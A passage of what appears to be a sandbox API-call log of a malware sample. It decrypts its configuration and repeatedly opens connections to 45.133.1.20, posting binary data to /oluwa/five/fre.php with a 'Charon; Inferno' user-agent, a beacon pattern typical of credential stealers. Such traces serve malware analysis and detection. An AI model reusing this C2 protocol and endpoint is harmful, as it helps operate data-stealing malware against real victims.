namelen=16) returned 0 [0156.763] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7a8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0156.763] GetProcessHeap () returned 0x6a0000 [0156.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0156.779] GetProcessHeap () returned 0x6a0000 [0156.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0156.781] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.782] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0156.782] GetProcessHeap () returned 0x6a0000 [0156.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc3b8 [0156.782] GetProcessHeap () returned 0x6a0000 [0156.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.782] GetProcessHeap () returned 0x6a0000 [0156.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0156.783] GetProcessHeap () returned 0x6a0000 [0156.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0156.783] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.784] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0156.785] GetProcessHeap () returned 0x6a0000 [0156.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc478 [0156.785] GetProcessHeap () returned 0x6a0000 [0156.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.786] send (s=0x270, buf=0x6bc478*, len=242, flags=0) returned 242 [0156.786] send (s=0x270, buf=0x6bb998*, len=159, flags=0) returned 159 [0156.786] GetProcessHeap () returned 0x6a0000 [0156.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0156.787] recv (in: s=0x270, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0156.849] GetProcessHeap () returned 0x6a0000 [0156.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc478 | out: hHeap=0x6a0000) returned 1 [0156.850] GetProcessHeap () returned 0x6a0000 [0156.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0156.850] GetProcessHeap () returned 0x6a0000 [0156.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc3b8 | out: hHeap=0x6a0000) returned 1 [0156.851] GetProcessHeap () returned 0x6a0000 [0156.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0156.851] closesocket (s=0x270) returned 0 [0156.852] GetProcessHeap () returned 0x6a0000 [0156.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0156.852] GetProcessHeap () returned 0x6a0000 [0156.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0156.853] GetProcessHeap () returned 0x6a0000 [0156.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0156.853] GetProcessHeap () returned 0x6a0000 [0156.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0156.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfc8) returned 0x270 [0156.858] Sleep (dwMilliseconds=0xea60) [0156.860] GetProcessHeap () returned 0x6a0000 [0156.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0156.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.861] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0156.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.868] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0156.875] GetProcessHeap () returned 0x6a0000 [0156.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0156.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.876] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0156.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.879] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.881] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.881] GetProcessHeap () returned 0x6a0000 [0156.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0156.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.883] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0156.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.884] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0156.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.885] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0156.885] GetProcessHeap () returned 0x6a0000 [0156.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0156.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.886] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0156.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.887] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0156.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.894] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0156.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.896] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0156.896] GetProcessHeap () returned 0x6a0000 [0156.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0156.896] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0156.896] GetProcessHeap () returned 0x6a0000 [0156.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0156.897] GetProcessHeap () returned 0x6a0000 [0156.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0156.897] GetProcessHeap () returned 0x6a0000 [0156.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0156.897] GetProcessHeap () returned 0x6a0000 [0156.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0156.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.898] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0156.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.907] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0156.913] GetProcessHeap () returned 0x6a0000 [0156.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0156.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.914] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0156.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.916] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.917] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.917] GetProcessHeap () returned 0x6a0000 [0156.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0156.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.918] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0156.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.919] CryptDestroyKey (hKey=0x6ad020) returned 1 [0156.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.920] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0156.920] GetProcessHeap () returned 0x6a0000 [0156.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0156.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.923] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0156.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.924] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0156.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.925] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0156.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.926] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0156.926] GetProcessHeap () returned 0x6a0000 [0156.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0156.926] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0156.926] GetProcessHeap () returned 0x6a0000 [0156.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0156.926] socket (af=2, type=1, protocol=6) returned 0x274 [0156.927] connect (s=0x274, name=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0156.955] FreeAddrInfoW (pAddrInfo=0x6b3698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0156.955] GetProcessHeap () returned 0x6a0000 [0156.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0156.955] GetProcessHeap () returned 0x6a0000 [0156.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0156.956] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.957] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0156.957] GetProcessHeap () returned 0x6a0000 [0156.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc3b8 [0156.957] GetProcessHeap () returned 0x6a0000 [0156.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.958] GetProcessHeap () returned 0x6a0000 [0156.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0156.958] GetProcessHeap () returned 0x6a0000 [0156.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0156.959] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.960] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0156.960] GetProcessHeap () returned 0x6a0000 [0156.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc478 [0156.960] GetProcessHeap () returned 0x6a0000 [0156.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.961] send (s=0x274, buf=0x6bc478*, len=242, flags=0) returned 242 [0156.962] send (s=0x274, buf=0x6bb998*, len=159, flags=0) returned 159 [0156.962] GetProcessHeap () returned 0x6a0000 [0156.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0156.962] recv (in: s=0x274, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0157.094] GetProcessHeap () returned 0x6a0000 [0157.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc478 | out: hHeap=0x6a0000) returned 1 [0157.095] GetProcessHeap () returned 0x6a0000 [0157.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0157.095] GetProcessHeap () returned 0x6a0000 [0157.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc3b8 | out: hHeap=0x6a0000) returned 1 [0157.095] GetProcessHeap () returned 0x6a0000 [0157.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0157.096] closesocket (s=0x274) returned 0 [0157.096] GetProcessHeap () returned 0x6a0000 [0157.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0157.096] GetProcessHeap () returned 0x6a0000 [0157.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0157.097] GetProcessHeap () returned 0x6a0000 [0157.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0157.097] GetProcessHeap () returned 0x6a0000 [0157.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0157.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xec8) returned 0x274 [0157.100] Sleep (dwMilliseconds=0xea60) [0157.101] GetProcessHeap () returned 0x6a0000 [0157.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0157.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.105] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0157.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.112] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0157.130] GetProcessHeap () returned 0x6a0000 [0157.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0be0 [0157.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.132] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0be0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0157.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.133] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0157.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.134] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0157.134] GetProcessHeap () returned 0x6a0000 [0157.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0be0 | out: hHeap=0x6a0000) returned 1 [0157.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.140] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0157.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.142] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0157.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.143] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0157.143] GetProcessHeap () returned 0x6a0000 [0157.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0157.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.150] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0157.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.151] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0157.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.153] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0157.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.154] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0157.154] GetProcessHeap () returned 0x6a0000 [0157.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0157.154] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0157.154] GetProcessHeap () returned 0x6a0000 [0157.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0157.155] GetProcessHeap () returned 0x6a0000 [0157.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0157.156] GetProcessHeap () returned 0x6a0000 [0157.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0157.156] GetProcessHeap () returned 0x6a0000 [0157.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0157.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0157.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.167] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0157.178] GetProcessHeap () returned 0x6a0000 [0157.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0157.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.179] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0157.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.181] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0157.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.182] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0157.182] GetProcessHeap () returned 0x6a0000 [0157.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0157.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.184] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0157.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.185] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0157.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.187] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0157.187] GetProcessHeap () returned 0x6a0000 [0157.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0157.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.188] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0157.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.189] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0157.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.191] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0157.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.192] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0157.192] GetProcessHeap () returned 0x6a0000 [0157.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0157.192] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0157.192] GetProcessHeap () returned 0x6a0000 [0157.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0157.192] socket (af=2, type=1, protocol=6) returned 0x278 [0157.192] connect (s=0x278, name=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0157.217] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0157.217] GetProcessHeap () returned 0x6a0000 [0157.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0157.217] GetProcessHeap () returned 0x6a0000 [0157.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0157.218] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0157.218] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php 